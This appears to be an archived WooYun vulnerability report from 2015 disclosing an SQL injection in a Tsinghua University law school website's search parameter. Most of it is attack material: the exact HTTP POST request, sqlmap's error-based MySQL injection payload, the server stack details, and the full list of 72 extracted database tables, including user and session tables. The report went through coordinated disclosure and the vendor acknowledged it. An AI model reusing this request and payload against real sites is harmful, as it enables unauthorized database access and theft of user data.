乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-26: 细节已通知厂商并且等待厂商处理中 2015-11-26: 厂商已经确认,细节仅向厂商公开 2015-12-06: 细节向核心白帽子及相关领域专家公开 2015-12-16: 细节向普通白帽子公开 2015-12-26: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
POST /homepage/index.php?cate_id=13&r=list/index HTTP/1.1Content-Length: 334Content-Type: application/x-www-form-urlencodedHost: academic.law.tsinghua.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*keyword="*"
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: keyword=" AND (SELECT 5174 FROM(SELECT COUNT(*),CONCAT(0x71717a6271,(SELECT (ELT(5174=5174,1))),0x71706a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- hrYI"---web server operating system: Windowsweb application technology: Apache 2.2.11, PHP 5.2.0back-end DBMS: MySQL 5.0Database: law[72 tables]+-----------------------------+| bak_banner || bak_bannerclient || bak_bannertrack || bak_categories || bak_components || bak_contact_details || bak_content || bak_content_frontpage || bak_content_rating || bak_core_acl_aro || bak_core_acl_aro_groups || bak_core_acl_aro_map || bak_core_acl_aro_sections || bak_core_acl_groups_aro_map || bak_core_log_items || bak_core_log_searches || bak_groups || bak_menu || bak_menu_types || bak_messages || bak_messages_cfg || bak_migration_backlinks || bak_modules || bak_modules_menu || bak_newsfeeds || bak_plugins || bak_poll_data || bak_poll_date || bak_poll_menu || bak_polls || bak_sections || bak_session || bak_stats_agents || bak_templates_menu || bak_users || bak_weblinks || jos_banner || jos_bannerclient || jos_bannertrack || jos_categories || jos_components || jos_contact_details || jos_content || jos_content_frontpage || jos_content_rating || jos_core_acl_aro || jos_core_acl_aro_groups || jos_core_acl_aro_map || jos_core_acl_aro_sections || jos_core_acl_groups_aro_map || jos_core_log_items || jos_core_log_searches || jos_groups || jos_menu || jos_menu_types || jos_messages || jos_messages_cfg || jos_migration_backlinks || jos_modules || jos_modules_menu || jos_newsfeeds || jos_plugins || jos_poll_data || jos_poll_date || jos_poll_menu || jos_polls || jos_sections || jos_session || jos_stats_agents || jos_templates_menu || jos_users || jos_weblinks |+-----------------------------+
危害等级:中
漏洞Rank:6
确认时间:2015-11-26 16:06
谢谢提醒,我们会尽快修改的。
暂无